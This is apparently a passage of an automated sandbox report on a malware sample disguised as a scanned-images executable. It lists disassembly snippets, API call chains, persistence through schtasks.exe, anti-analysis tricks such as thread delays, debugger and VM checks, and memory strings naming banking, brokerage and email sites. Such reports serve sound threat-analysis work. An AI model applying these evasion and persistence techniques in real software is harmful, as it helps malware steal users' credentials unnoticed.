            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D01368 push eax; iretd 2_2_02D01369
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeCode function: 8_2_0323C39F push 195B6DB7h; iretd 8_2_0323C3A6
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeCode function: 8_2_0323CA09 pushfd ; retf 8_2_0323CA0D
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeCode function: 8_2_03220A77 push edi; retf 8_2_03220A8C
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeCode function: 8_2_03233918 push ss; retf 8_2_032339B2
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeCode function: 8_2_03237960 push D1A60662h; ret 8_2_03237965
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeCode function: 8_2_032380B1 push FFFFFFFDh; ret 8_2_032380B4
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeCode function: 8_2_032330FB push ss; ret 8_2_032330FC
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeCode function: 8_2_032267F8 pushfd ; ret 8_2_032267FC
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeCode function: 8_2_03237621 push ss; ret 8_2_03237632
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeCode function: 8_2_032376D7 push edx; iretd 8_2_032376DF
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeFile created: \scanned-imgs_from bumi wangsa tms sdn bhd..exe
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeFile created: \scanned-imgs_from bumi wangsa tms sdn bhd..exeJump to behavior

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A24A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00A24A35
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00AA55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00AA55FD
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A433C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00A433C7
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeAPI/Special instruction interceptor: Address: 1693224
            Source: C:\Windows\SysWOW64\schtasks.exeAPI/Special instruction interceptor: Address: 7FF90818D324
            Source: C:\Windows\SysWOW64\schtasks.exeAPI/Special instruction interceptor: Address: 7FF90818D944
            Source: C:\Windows\SysWOW64\schtasks.exeAPI/Special instruction interceptor: Address: 7FF90818D504
            Source: C:\Windows\SysWOW64\schtasks.exeAPI/Special instruction interceptor: Address: 7FF90818D544
            Source: C:\Windows\SysWOW64\schtasks.exeAPI/Special instruction interceptor: Address: 7FF90818D1E4
            Source: C:\Windows\SysWOW64\schtasks.exeAPI/Special instruction interceptor: Address: 7FF908190154
            Source: C:\Windows\SysWOW64\schtasks.exeAPI/Special instruction interceptor: Address: 7FF90818DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D7096E rdtsc 2_2_02D7096E
            Source: C:\Windows\SysWOW64\schtasks.exeWindow / User API: threadDelayed 3013Jump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeWindow / User API: threadDelayed 6959Jump to behavior
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeEvaded block: after key decisiongraph_0-99610
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-100753
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeAPI coverage: 4.8 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
            Source: C:\Windows\SysWOW64\schtasks.exeAPI coverage: 2.3 %
            Source: C:\Windows\SysWOW64\schtasks.exe TID: 2148Thread sleep count: 3013 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exe TID: 2148Thread sleep time: -6026000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exe TID: 2148Thread sleep count: 6959 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exe TID: 2148Thread sleep time: -13918000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe TID: 2624Thread sleep time: -65000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe TID: 2624Thread sleep time: -52500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe TID: 2624Thread sleep time: -36000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\schtasks.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A84696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00A84696
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A8C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00A8C9C7
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A8C93C FindFirstFileW,FindClose,0_2_00A8C93C
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A8F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00A8F200
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A8F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00A8F35D
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A8F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00A8F65E
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A83A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00A83A2B
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A83D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00A83D4E
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A8BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00A8BF27
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_026CBAB0 FindFirstFileW,FindNextFileW,FindClose,9_2_026CBAB0
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A24AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00A24AFE
            Source: j0941BH0.9.drBinary or memory string: dev.azure.comVMware20,11696497155j
            Source: j0941BH0.9.drBinary or memory string: global block list test formVMware20,11696497155
            Source: j0941BH0.9.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
            Source: j0941BH0.9.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
            Source: j0941BH0.9.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
            Source: XraVxjqYYo.exe, 0000000A.00000002.3808040065.0000000001219000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllk
            Source: j0941BH0.9.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
            Source: j0941BH0.9.drBinary or memory string: tasks.office.comVMware20,11696497155o
            Source: j0941BH0.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
            Source: j0941BH0.9.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
            Source: firefox.exe, 0000000C.00000002.1915319420.0000023723C0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: j0941BH0.9.drBinary or memory string: bankofamerica.comVMware20,11696497155x
            Source: j0941BH0.9.drBinary or memory string: ms.portal.azure.comVMware20,11696497155
            Source: j0941BH0.9.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
            Source: j0941BH0.9.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
            Source: j0941BH0.9.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
            Source: j0941BH0.9.drBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
            Source: j0941BH0.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
            Source: j0941BH0.9.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
            Source: j0941BH0.9.drBinary or memory string: interactivebrokers.comVMware20,11696497155
            Source: schtasks.exe, 00000009.00000002.3801096520.00000000028E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=4et
            Source: j0941BH0.9.drBinary or memory string: AMC password management pageVMware20,11696497155
            Source: j0941BH0.9.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
            Source: j0941BH0.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
            Source: j0941BH0.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
            Source: j0941BH0.9.drBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
            Source: j0941BH0.9.drBinary or memory string: discord.comVMware20,11696497155f
            Source: j0941BH0.9.drBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
            Source: j0941BH0.9.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
            Source: j0941BH0.9.drBinary or memory string: outlook.office365.comVMware20,11696497155t
            Source: j0941BH0.9.drBinary or memory string: outlook.office.comVMware20,11696497155s
            Source: j0941BH0.9.drBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
            Source: j0941BH0.9.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
            Source: j0941BH0.9.drBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D7096E rdtsc 2_2_02D7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02137783 LdrLoadDll,2_2_02137783
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A941FD BlockInput,0_2_00A941FD
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A23B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00A23B4C
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A55CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00A55CCC
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A9C304 LoadLibraryA,GetProcAddress,0_2_00A9C304
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_016934F0 mov eax, dword ptr fs:[00000030h]0_2_016934F0
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_01693490 mov eax, dword ptr fs:[00000030h]0_2_01693490
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_01691E70 mov eax, dword ptr fs:[00000030h]0_2_01691E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02D3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02D3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02D3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02D3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02D3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D402E1 mov eax, dword ptr fs:[00000030h]2_2_02D402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D402E1 mov eax, dword ptr fs:[00000030h]2_2_02D402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D402E1 mov eax, dword ptr fs:[00000030h]2_2_02D402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E062D6 mov eax, dword ptr fs:[00000030h]2_2_02E062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E284 mov eax, dword ptr fs:[00000030h]2_2_02D6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E284 mov eax, dword ptr fs:[00000030h]2_2_02D6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB0283 mov eax, dword ptr fs:[00000030h]2_2_02DB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB0283 mov eax, dword ptr fs:[00000030h]2_2_02DB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB0283 mov eax, dword ptr fs:[00000030h]2_2_02DB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D402A0 mov eax, dword ptr fs:[00000030h]2_2_02D402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D402A0 mov eax, dword ptr fs:[00000030h]2_2_02D402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC62A0 mov eax, dword ptr fs:[00000030h]2_2_02DC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC62A0 mov ecx, dword ptr fs:[00000030h]2_2_02DC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC62A0 mov eax, dword ptr fs:[00000030h]2_2_02DC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC62A0 mov eax, dword ptr fs:[00000030h]2_2_02DC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC62A0 mov eax, dword ptr fs:[00000030h]2_2_02DC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC62A0 mov eax, dword ptr fs:[00000030h]2_2_02DC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2A250 mov eax, dword ptr fs:[00000030h]2_2_02D2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D36259 mov eax, dword ptr fs:[00000030h]2_2_02D36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DEA250 mov eax, dword ptr fs:[00000030h]2_2_02DEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DEA250 mov eax, dword ptr fs:[00000030h]2_2_02DEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB8243 mov eax, dword ptr fs:[00000030h]2_2_02DB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB8243 mov ecx, dword ptr fs:[00000030h]2_2_02DB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE0274 mov eax, dword ptr fs:[00000030h]2_2_02DE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE0274 mov eax, dword ptr fs:[00000030h]2_2_02DE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE0274 mov eax, dword ptr fs:[00000030h]2_2_02DE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE0274 mov eax, dword ptr fs:[00000030h]2_2_02DE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE0274 mov eax, dword ptr fs:[00000030h]2_2_02DE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE0274 mov eax, dword ptr fs:[00000030h]2_2_02DE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE0274 mov eax, dword ptr fs:[00000030h]2_2_02DE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE0274 mov eax, dword ptr fs:[00000030h]2_2_02DE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE0274 mov eax, dword ptr fs:[00000030h]2_2_02DE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE0274 mov eax, dword ptr fs:[00000030h]2_2_02DE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE0274 mov eax, dword ptr fs:[00000030h]2_2_02DE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE0274 mov eax, dword ptr fs:[00000030h]2_2_02DE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D34260 mov eax, dword ptr fs:[00000030h]2_2_02D34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D34260 mov eax, dword ptr fs:[00000030h]2_2_02D34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D34260 mov eax, dword ptr fs:[00000030h]2_2_02D34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2826B mov eax, dword ptr fs:[00000030h]2_2_02D2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E0625D mov eax, dword ptr fs:[00000030h]2_2_02E0625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2823B mov eax, dword ptr fs:[00000030h]2_2_02D2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE3DB mov eax, dword ptr fs:[00000030h]2_2_02DDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE3DB mov eax, dword ptr fs:[00000030h]2_2_02DDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE3DB mov ecx, dword ptr fs:[00000030h]2_2_02DDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE3DB mov eax, dword ptr fs:[00000030h]2_2_02DDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD43D4 mov eax, dword ptr fs:[00000030h]2_2_02DD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD43D4 mov eax, dword ptr fs:[00000030h]2_2_02DD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DEC3CD mov eax, dword ptr fs:[00000030h]2_2_02DEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02D3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02D3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02D3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02D3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02D3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02D3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D383C0 mov eax, dword ptr fs:[00000030h]2_2_02D383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D383C0 mov eax, dword ptr fs:[00000030h]2_2_02D383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D383C0 mov eax, dword ptr fs:[00000030h]2_2_02D383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D383C0 mov eax, dword ptr fs:[00000030h]2_2_02D383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB63C0 mov eax, dword ptr fs:[00000030h]2_2_02DB63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4E3F0 mov eax, dword ptr fs:[00000030h]2_2_02D4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4E3F0 mov eax, dword ptr fs:[00000030h]2_2_02D4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4E3F0 mov eax, dword ptr fs:[00000030h]2_2_02D4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D663FF mov eax, dword ptr fs:[00000030h]2_2_02D663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D403E9 mov eax, dword ptr fs:[00000030h]2_2_02D403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D403E9 mov eax, dword ptr fs:[00000030h]2_2_02D403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D403E9 mov eax, dword ptr fs:[00000030h]2_2_02D403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D403E9 mov eax, dword ptr fs:[00000030h]2_2_02D403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D403E9 mov eax, dword ptr fs:[00000030h]2_2_02D403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D403E9 mov eax, dword ptr fs:[00000030h]2_2_02D403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D403E9 mov eax, dword ptr fs:[00000030h]2_2_02D403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D403E9 mov eax, dword ptr fs:[00000030h]2_2_02D403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D28397 mov eax, dword ptr fs:[00000030h]2_2_02D28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D28397 mov eax, dword ptr fs:[00000030h]2_2_02D28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D28397 mov eax, dword ptr fs:[00000030h]2_2_02D28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2E388 mov eax, dword ptr fs:[00000030h]2_2_02D2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2E388 mov eax, dword ptr fs:[00000030h]2_2_02D2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2E388 mov eax, dword ptr fs:[00000030h]2_2_02D2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5438F mov eax, dword ptr fs:[00000030h]2_2_02D5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5438F mov eax, dword ptr fs:[00000030h]2_2_02D5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB035C mov eax, dword ptr fs:[00000030h]2_2_02DB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB035C mov eax, dword ptr fs:[00000030h]2_2_02DB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB035C mov eax, dword ptr fs:[00000030h]2_2_02DB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB035C mov ecx, dword ptr fs:[00000030h]2_2_02DB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB035C mov eax, dword ptr fs:[00000030h]2_2_02DB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB035C mov eax, dword ptr fs:[00000030h]2_2_02DB035C
